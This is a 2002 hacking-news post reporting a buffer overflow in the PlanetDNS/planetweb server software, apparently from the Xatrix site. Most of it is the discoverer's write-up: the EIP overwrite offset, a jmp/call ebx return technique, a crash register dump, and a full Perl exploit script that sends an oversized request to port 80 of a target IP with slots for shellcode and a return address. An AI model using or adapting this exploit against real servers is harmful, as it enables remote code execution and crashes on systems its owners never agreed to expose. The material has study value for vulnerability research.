Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » New buffer overflow in PlanetDNS

New buffer overflow in PlanetDNS

by Nikola Strahija on October 18th, 2002 planetdns ( http://www.planetdns.net)is commercial software package that allows to turn computer into an Internet server. and be able to create an Internet Name, connect to a web server, FTP, mail server, etc. running on computer.


planetdns is vulnerable has a buffer overflow with a
overwrite of eip (never posted before )... one already
notified that a number of 1024 byte could crasher the
server, and I found that while sending (without GET/)un of
6500 byte could thus make a overwrite eip of execution of a
shellcode, the overwrite is done with byte 6449, 50, 51,
52.
one notices of aillor that ebx and always 4byte before the
eip the ret address will be thus a jmp ebx or call ebx that
one finds in many modules charged .
I realised an exploit tested on plaetweb v1.14 and who
gives L state of the following registers:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5
esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
christal...plus tu pédales moins fort, moins tu #avances
plus vite..)
#

use IO::Socket;
if ($#ARGV<0)
{
print "n write the target IP!! nn";
exit;
}

$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer = "A"x6444;
$ebx = "x90xEBx08x90";# you have the chance because ebx
= eip - 4 bytes jmp short 0xff x0d3
$ret = "x43x43x43x43";# insert your ret address with
(jmp ebx or call ebx)
$minibuf ="x90x90x90x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "nsending exploit......nn";


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »